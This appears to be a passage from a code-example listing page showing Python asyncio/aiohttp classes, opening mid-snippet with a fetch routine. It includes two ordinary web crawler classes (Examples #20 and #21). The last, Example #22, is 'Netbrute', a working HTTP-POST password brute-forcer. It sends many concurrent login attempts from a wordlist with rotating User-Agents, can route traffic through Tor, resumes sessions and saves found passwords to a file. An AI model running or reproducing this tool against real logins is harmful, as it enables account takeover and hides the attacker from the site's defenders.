                        content_type = response.headers.get('content-type')
                        if content_type in CONTENT_TYPE_TEXT:
                            with aiohttp.Timeout(self.timeout):
                                content = yield from response.text(
                                    encoding='GBK')
                        else:
                            with aiohttp.Timeout(self.timeout):
                                content = yield from response.read()
                    break
            except asyncio.TimeoutError:
                print("timeout")
            except aiohttp.ClientError as client_error:
                print("client error")
            except Exception:
                print("unknown error")
            tries += 1
        else:
            print("try %s---->more than %d times, quit" % (url, tries))
            return None

        response.release()
        return content

    @asyncio.coroutine
    def _work(self):
        """Process queue items forever."""
        try:
            while True:
                r = yield from self._get_request()
                content = yield from self.fetch(r.request_type, r.url,
                                                r.params, r.data)
                if (content):
                    r.handle_func(content)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    @asyncio.coroutine
    def work(self):
        yield from self._work()

    @asyncio.coroutine
    def spider(self):
        """run  the spider until all finished"""
        workers = [
            asyncio.Task(self.work(), loop=self.loop)
            for _ in range(self.max_tasks)
        ]
        yield from self.q.join()

        for w in workers:
            w.cancel()

Example #20

Show file

class Crawler:
    def __init__(self, root, max_tasks=1000, loop=None, file=None):
        LOGGER.info('Starting Crawler ...\n')
        self.loop = loop or asyncio.get_event_loop()
        self.q = Queue(loop=self.loop)
        self.visited_urls = set()
        self.max_tasks = max_tasks
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.root_domains = set()

        parts = urllib.parse.urlparse(root)
        host, port = urllib.parse.splitport(parts.netloc)
        if re.match(r'\A[\d\.]*\Z', host):
            self.root_domains.add(host)
        else:
            host = host.lower()
            self.root_domains.add(host)

        print('Hosts : {}'.format(','.join(self.root_domains)))

        self.add_url(root)

        self.t0 = time.time()
        self.t1 = None
        filename = '{}.csv'.format(file)
        self.f = open(filename, 'w')
        self.csv = csv.writer(self.f)
        self.csv.writerow(CSV_HEADER)

    def add_url(self, url):
        LOGGER.debug('adding %r', url)
        self.visited_urls.add(url)
        self.q.put_nowait(url)

    def close(self):
        self.session.close()
        self.f.close()

    def host_okay(self, host):
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        return self._host_okay_strict(host)

    def _host_okay_strict(self, host):
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def url_allowed(self, url):
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):
            LOGGER.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(host):
            LOGGER.debug('skipping non-root host in %r', url)
            return False
        return True

    @asyncio.coroutine
    def parse_response(self, response):
        links = set()
        if response.status == 200:
            content_type = response.headers.get('content-type')

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text()
                urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''', text))
                if urls:
                    LOGGER.info('got %r distinct urls from %r', len(urls),
                                response.url)
                for url in urls:
                    normalized = urllib.parse.urljoin(response.url, url)
                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)

                if links:
                    LOGGER.info('got %r distinct urls from %r', len(links),
                                response.url)
                for link in links.difference(self.visited_urls):
                    self.q.put_nowait(link)
                self.visited_urls.update(links)
        return links

    @asyncio.coroutine
    def fetch(self, url):
        try:
            response = yield from self.session.get(url, allow_redirects=False)
            self.csv.writerow([url, response.status])

            if is_redirect(response):
                location = response.headers['location']
                next_url = urllib.parse.urljoin(url, location)
                if next_url in self.visited_urls:
                    return
                else:
                    self.add_url(next_url)
            else:
                links = yield from self.parse_response(response)

                for link in links.difference(self.visited_urls):
                    self.q.put_nowait(link)
                self.visited_urls.update(links)
            yield from response.release()
        except aiohttp.ClientError as client_error:
            LOGGER.info('try for %r raised %r', url, client_error)

    @asyncio.coroutine
    def work(self):
        try:
            while True:
                url = yield from self.q.get()
                assert url in self.visited_urls
                yield from self.fetch(url)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    @asyncio.coroutine
    def crawl(self):
        workers = [
            asyncio.Task(self.work(), loop=self.loop)
            for _ in range(self.max_tasks)
        ]
        self.t0 = time.time()
        yield from self.q.join()
        self.t1 = time.time()
        for w in workers:
            w.cancel()

Example #21

Show file

class Crawler:
    """Crawl a set of URLs.

    This manages two sets of URLs: 'urls' and 'done'.  'urls' is a set of
    URLs seen, and 'done' is a list of FetchStatistics.
    这里面有两个队列.seen_urls 和 done
    """
    # TODO xpath support
    # TODO uvloop support
    def __init__(self, roots,
                 exclude=None, strict=True,  # What to crawl.
                 max_redirect=10, max_tries=4,  # Per-url limits.
                 max_tasks=10, *, loop=None):
        self.loop = loop or asyncio.get_event_loop()
        self.roots = roots
        self.exclude = exclude
        self.strict = strict
        self.max_redirect = max_redirect
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.q = Queue(loop=self.loop)
        self.seen_urls = set()
        self.done = []
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.root_domains = set()
        for root in roots:
            parts = urllib.parse.urlparse(root)
            host, port = urllib.parse.splitport(parts.netloc)
            if not host:
                continue
            if re.match(r'\A[\d\.]*\Z', host):
                self.root_domains.add(host)
            else:
                host = host.lower()
                if self.strict:
                    self.root_domains.add(host)
                else:
                    self.root_domains.add(lenient_host(host))
        for root in roots:
            self.add_url(root)
        self.t0 = time.time()
        self.t1 = None

    def close(self):
        """Close resources."""
        self.session.close()

    def host_okay(self, host):
        """Check if a host should be crawled.

        A literal match (after lowercasing) is always good.  For hosts
        that don't look like IP addresses, some approximate matches
        are okay depending on the strict flag.
        """
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        if self.strict:
            return self._host_okay_strictish(host)
        else:
            return self._host_okay_lenient(host)

    def _host_okay_strictish(self, host):
        """Check if a host should be crawled, strict-ish version.

        This checks for equality modulo an initial 'www.' component.
        """
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def _host_okay_lenient(self, host):
        """Check if a host should be crawled, lenient version.

        This compares the last two components of the host.
        """
        return lenient_host(host) in self.root_domains

    def record_statistic(self, fetch_statistic):
        """Record the FetchStatistic for completed / failed URL."""
        self.done.append(fetch_statistic)

    @asyncio.coroutine
    def parse_links(self, response):
        """Return a FetchStatistic and list of links."""
        links = set()
        content_type = None
        encoding = None
        body = yield from response.read()

        if response.status == 200:
            content_type = response.headers.get('content-type')
            pdict = {}

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            encoding = pdict.get('charset', 'utf-8')
            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text()

                # Replace href with (?:href|src) to follow image links.
                urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''',
                                      text))
                if urls:
                    LOGGER.info('got %r distinct urls from %r',
                                len(urls), response.url)
                for url in urls:
                    normalized = urllib.parse.urljoin(response.url, url)
                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)

        stat = FetchStatistic(
            url=response.url,
            next_url=None,
            status=response.status,
            exception=None,
            size=len(body),
            content_type=content_type,
            encoding=encoding,
            num_urls=len(links),
            num_new_urls=len(links - self.seen_urls))

        return stat, links

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        """Fetch one URL."""
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                response = yield from self.session.get(
                    url, allow_redirects=False)

                if tries > 1:
                    LOGGER.info('try %r for %r success', tries, url)

                break
            except aiohttp.ClientError as client_error:
                LOGGER.info('try %r for %r raised %r', tries, url, client_error)
                exception = client_error

            tries += 1
        else:
            # We never broke out of the loop: all tries failed.
            LOGGER.error('%r failed after %r tries',
                         url, self.max_tries)
            self.record_statistic(FetchStatistic(url=url,
                                                 next_url=None,
                                                 status=None,
                                                 exception=exception,
                                                 size=0,
                                                 content_type=None,
                                                 encoding=None,
                                                 num_urls=0,
                                                 num_new_urls=0))
            return

        try:
            if is_redirect(response):
                location = response.headers['location']
                next_url = urllib.parse.urljoin(url, location)
                self.record_statistic(FetchStatistic(url=url,
                                                     next_url=next_url,
                                                     status=response.status,
                                                     exception=None,
                                                     size=0,
                                                     content_type=None,
                                                     encoding=None,
                                                     num_urls=0,
                                                     num_new_urls=0))

                if next_url in self.seen_urls:
                    return
                if max_redirect > 0:
                    LOGGER.info('redirect to %r from %r', next_url, url)
                    self.add_url(next_url, max_redirect - 1)
                else:
                    LOGGER.error('redirect limit reached for %r from %r',
                                 next_url, url)
            else:
                stat, links = yield from self.parse_links(response)
                self.record_statistic(stat)
                for link in links.difference(self.seen_urls):
                    self.q.put_nowait((link, self.max_redirect))
                self.seen_urls.update(links)
        finally:
            yield from response.release()

    @asyncio.coroutine
    def work(self):
        """Process queue items forever."""
        try:
            while True:
                url, max_redirect = yield from self.q.get()
                assert url in self.seen_urls
                yield from self.fetch(url, max_redirect)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    def url_allowed(self, url):
        if self.exclude and re.search(self.exclude, url):
            return False
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):
            LOGGER.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(host):
            LOGGER.debug('skipping non-root host in %r', url)
            return False
        return True

    def add_url(self, url, max_redirect=None):
        """Add a URL to the queue if not seen before."""
        if max_redirect is None:
            max_redirect = self.max_redirect
        LOGGER.debug('adding %r %r', url, max_redirect)
        self.seen_urls.add(url)
        self.q.put_nowait((url, max_redirect))

    @asyncio.coroutine
    def crawl(self):
        """Run the crawler until all finished."""
        workers = [asyncio.Task(self.work(), loop=self.loop)
                   for _ in range(self.max_tasks)]
        self.t0 = time.time()
        yield from self.q.join()
        self.t1 = time.time()
        for w in workers:
            w.cancel()

Example #22

Show file

class Netbrute:
    """
    HTTP-POST BruteForcer
    """
    def __init__(self, loop, pre_url=None, pre_payload=None, target_url=None, login=None, payload_model=None, wordlist=None, error_string=None, tasks=64, tor=None, tor_address=None, debug=None):
        self.max_tasks = tasks
        self.queue = Queue()
        self.pre_url = pre_url
        self.pre_payload = self._generate_payload_type(pre_payload)
        self.attack_url = target_url
        self.login = login
        self.error_string = [x.strip() for x in error_string.split(',')]
        self.payload = self._generate_payload_type(payload_model)
        self.wordlist = wordlist
        self.found = Event()
        self.tor_use = tor
        #self.session = self._generate_new_session(loop)
        self.debug = debug
        self.runned_passwords = set()
        self.old_passwds = set()
        self.restore_files = []
        self.progress_bar = None
        self.ua = self._prepare_user_agents()
        self.start_time = time.time()
        self.last_report_time = time.time()

        # Statuses set of settings
        self.loaded_passwords = 0
        self.tried_passwords = 0
        self.error_passwords = 0
        self.max_passwords = 0

        # Tor set of settings
        if self.tor_use is not None and tor_address is not None:
            ip, port = parse_proxy_address(tor_address)
            self.tor_address = "http://{0}:{1}".format(ip, port)
            self.tor_address_string = tor_address

        # Session set of settings
        self.session_name = self._generate_session_name()
        restore_files = self._search_open_sesssion()
        if restore_files > 0:
            for file in self.restore_files:
                if self._load_old_session(file) is True:
                    break
        else:
            pass

    @staticmethod
    def _prepare_user_agents():
        #  Load user agents
        ua = get_user_agents()
        if not ua:
            raise Exception("No user agents available")
        return ua

    def _load_old_session(self, fn):
        """
        Function to ask user input and decide to use or not to use restore files.
        This also decompress (if it can) and reads data, storing it inside the main object.
        :param fn: String => Filename
        :return: Boolean
        """

        question = input("\n[*] Do you want to load passwords from file '{0}'? [y/N] ".format(os.path.basename(fn)))

        if question.upper() == "Y":
            try:
                #  Decompress the data and store it raw
                with gzip.open(fn, "rb", compresslevel=9) as f:
                    _data = f.read()
                with open(fn, "wb") as f:
                    f.write(_data)
            except:
                #  If decompression fails, probably it is not compressed.
                #  So we will open it and read, as it should.
                with open(fn, "rb") as f:
                    _data = f.read()

            #  Read data from file, decode it from BinaryBuffer to String.
            lines = [x.decode() for x in _data.split(b"\n")]

            #  Finally, add each line to old_passwords set.
            for line in lines:
                if line != "":
                    self.old_passwds.add(line)

            #  Define the session name as the restore file used.
            self.session_name = os.path.basename(fn)
            return True
        else:
            return False

    def _search_open_sesssion(self):
        current_dir = os.getcwd() + os.sep
        for root, dirc, files in os.walk(current_dir):
            for f in files:
                if f.endswith(".restore"):
                    file_path = os.path.join(root, f)
                    self.restore_files.append(file_path)
        return len(self.restore_files)

    @staticmethod
    def _generate_session_name():
        _id = hex(random.randint(0, 999999))
        return "session_{0}.restore".format(_id[2:])

    @staticmethod
    def _generate_payload_type(user_input):
        """
        Function responsible for transforming String type into Dictionary type
        :param user_input: str
        :return: d: dict
        """
        d = dict()
        p = [x.strip() for x in user_input.split(",")]
        for element in p:
            key, value = element.split(":")
            d[key] = value
        return d

    @staticmethod
    def _encode_payload_www(unencoded_payload):
        """
        Function responsible for transforming a dictionary payload into x-www-form-urlencoded payload
        :param unencoded_payload:
        :return:
        """
        pl = str()
        dict_len = len(unencoded_payload)
        i = 1
        for key in unencoded_payload:
            if i != dict_len:
                pl += "{0}={1}&".format(key, unencoded_payload[key])
            else:
                pl += "{0}={1}".format(key, unencoded_payload[key])
            i += 1
        return pl

    def _adjust_payload(self, payload, password=None, login=None):
        """
        Creates a copy from payload supplied by user, then formats it with attack data.
        :param password: String
        :return: tmp_payload: String
        """
        tmp_payload = copy(payload)
        for key in tmp_payload:
            value = tmp_payload[key]
            if value.upper() == "PASS":
                #  Modify the payload prototype with the queue's password.
                if password is not None:
                    tmp_payload[key] = password

            elif value.upper() == "LOGIN":
                #  Modify the payload prototype with the supplied login
                if login is not None:
                    tmp_payload[key] = login
            else:
                continue
        return tmp_payload

    @staticmethod
    def _store_data(fn, data):
        """
        Stores buffer of data into a file and adds a new line at the end of it.
        :param fn: String => Filename for a file
        :param data: String => Data buffer
        :return: None
        """
        data += "\n"
        with open(fn, "a") as f:
            f.write(data)
        return

    def _increment_progress_bar(self):
        """
        Check if one second has passed since last report, then renewal the progress bar with current attack progress
        :return: None
        """
        if (time.time() - self.last_report_time) < 1:
            return
        self.last_report_time = time.time()
        self.progress_bar.update((self.max_passwords - self.loaded_passwords) + self.tried_passwords)

    def _parse_response(self, status, response_url, passwd):
        """
        Parses the response packet based on http status code and response URL
        :param status: Integer => HTTP status code
        :param response_url: String => Request URL response
        :param passwd: String => Password that originated this response
        :return: None
        """
        for error_string in self.error_string:
            if type(response_url is yarl.URL):
                response_url = response_url.query_string
            if error_string in response_url:
                self.tried_passwords += 1
                self.runned_passwords.add(passwd)
                if len(self.runned_passwords) % 100 == 0:
                    [self._store_data(self.session_name, x) for x in self.runned_passwords]
                    self.runned_passwords.clear()
                return
        if status == 200:
            print("\n[+] Password was found: {0}".format(passwd))
            print("[*] Response URL: {0}".format(response_url))
            self._store_data("correct.pass", passwd)
            self._store_data("correct.pass", "{0}\n\n".format(self.payload))
            self.found.set()
        return


    async def pre_page_request(self, session):
        #  Use tor or not
        if self.tor_use is True:
            proxy_addr = self.tor_address
        else:
            proxy_addr = None

        #  We will always create new headers for you, dear sysadmin...
        headers = {
            "content-type": "application/x-www-form-urlencoded",
            "User-Agent": random.choice(self.ua),
        }

        #  Generate the payload
        custom_payload = self._adjust_payload(self.pre_payload, login=self.login)

        # Do the first request.
        async with session.post(self.pre_url, data=self._encode_payload_www(custom_payload), headers=headers, proxy=proxy_addr) as response:
            status, response_url = response.status, response.url
            if status == 200:
                return 0, headers
            else:
                return 1, headers


    async def attack_this(self, session, password, headers=None):
        """
        Perform IO operation for http request
        :param password: String => Password used in the attack
        :return: None
        """
        if self.debug:
            print("Started attack!")

        #  We need a header if not previously;
        if headers is None:
            headers = {
                "content-type": "application/x-www-form-urlencoded",
                "User-Agent": random.choice(self.ua),
            }

        custom_payload = self._adjust_payload(self.payload, password=password)

        # AsyncTimeout removed since commit c47781f
        #  with async_timeout.timeout(10):
        if self.tor_use is True:
            proxy_addr = self.tor_address
        else:
            proxy_addr = None
        async with session.post(self.attack_url, data=self._encode_payload_www(custom_payload), headers=headers, proxy=proxy_addr) as response:

            status, response_url = response.status, response.url

            self._parse_response(status, response_url, password)

            if self.debug is False:
                self._increment_progress_bar()

            if self.debug:
                print("Ended attack! [{0}] - Status: {1} - URL: {2}".format(password, status, response_url))
        return

    def _parse_wordlist(self, iterable):
        return list(filter(lambda x: x not in self.old_passwds, iterable))

    def _read_wordlist(self):
        tmp_list = []
        with open(self.wordlist, "r") as f:
            for line in f.readlines():
                tmp_list.append(line.replace("\n", ""))
        parsed_list = self._parse_wordlist(tmp_list)
        for element in parsed_list:
            self.queue.put_nowait(element)
        self.max_passwords = len(tmp_list)
        self.loaded_passwords = len(parsed_list)
        return len(parsed_list)


    def _generate_new_session(self, loop):
        #  Create cookie jar
        jar = aiohttp.CookieJar(unsafe=True)

        #  Adjust session object and tor usage information
        if self.tor_use is True:
            #print("[+] Using tor with address {0}\n".format(self.tor_address_string))
            conn = get_tor_connector(self.tor_address_string)
            session = aiohttp.ClientSession(loop=loop, cookie_jar=jar, connector=conn)
        else:
            session = aiohttp.ClientSession(loop=loop, cookie_jar=jar)
        return session

    @asyncio.coroutine
    def work(self, loop):
        while not self.queue.empty():
            #  Create new aiohttp session
            session = self._generate_new_session(loop)
            # Check if password is found and throw queue away
            if self.found.is_set():
                # noinspection PyProtectedMember
                for _ in range(len(self.queue._queue)):
                    yield from self.queue.get()

            #  Retrieve passwords from queue and test them
            password = yield from self.queue.get()

            # Do the request and deal with timeout
            try:
                k, headers = yield from self.pre_page_request(session)
                if k == 0:
                    yield from self.attack_this(session, password, headers=headers)
            except Exception as e:
                if self.debug:
                    print("Password '{0}' request timed out.".format(password))
                    print("Error: {0}\n".format(e))
                self.queue.put_nowait(password)
                pass
            session.close()
            self.queue.task_done()

    @asyncio.coroutine
    def initiate(self, loop):

        #  Attack preparation phase
        if self.debug:
            print("Started initiation!")
        pass_number = self._read_wordlist()
        print("\n[*] Program have read {0} passwords.\n".format(pass_number))

        #  Graphical visualization of attack status
        self.progress_bar = ProgressBar(widgets=
                                        ["Guesses: ", Counter(), "/", str(self.max_passwords),
                                         " [", Percentage(), "] ", Bar(marker="#"), " ", AdaptiveETA()],
                                        maxval=self.max_passwords).start()
        self.progress_bar.update(self.max_passwords - pass_number)

        #  Now the code to run the tasks and execute the async requests
        workers = [asyncio.Task(self.work(loop)) for _ in range(self.max_tasks)]
        yield from self.queue.join()
        for w in workers:
            w.cancel()
        if self.debug:
            print("Ended initiation!")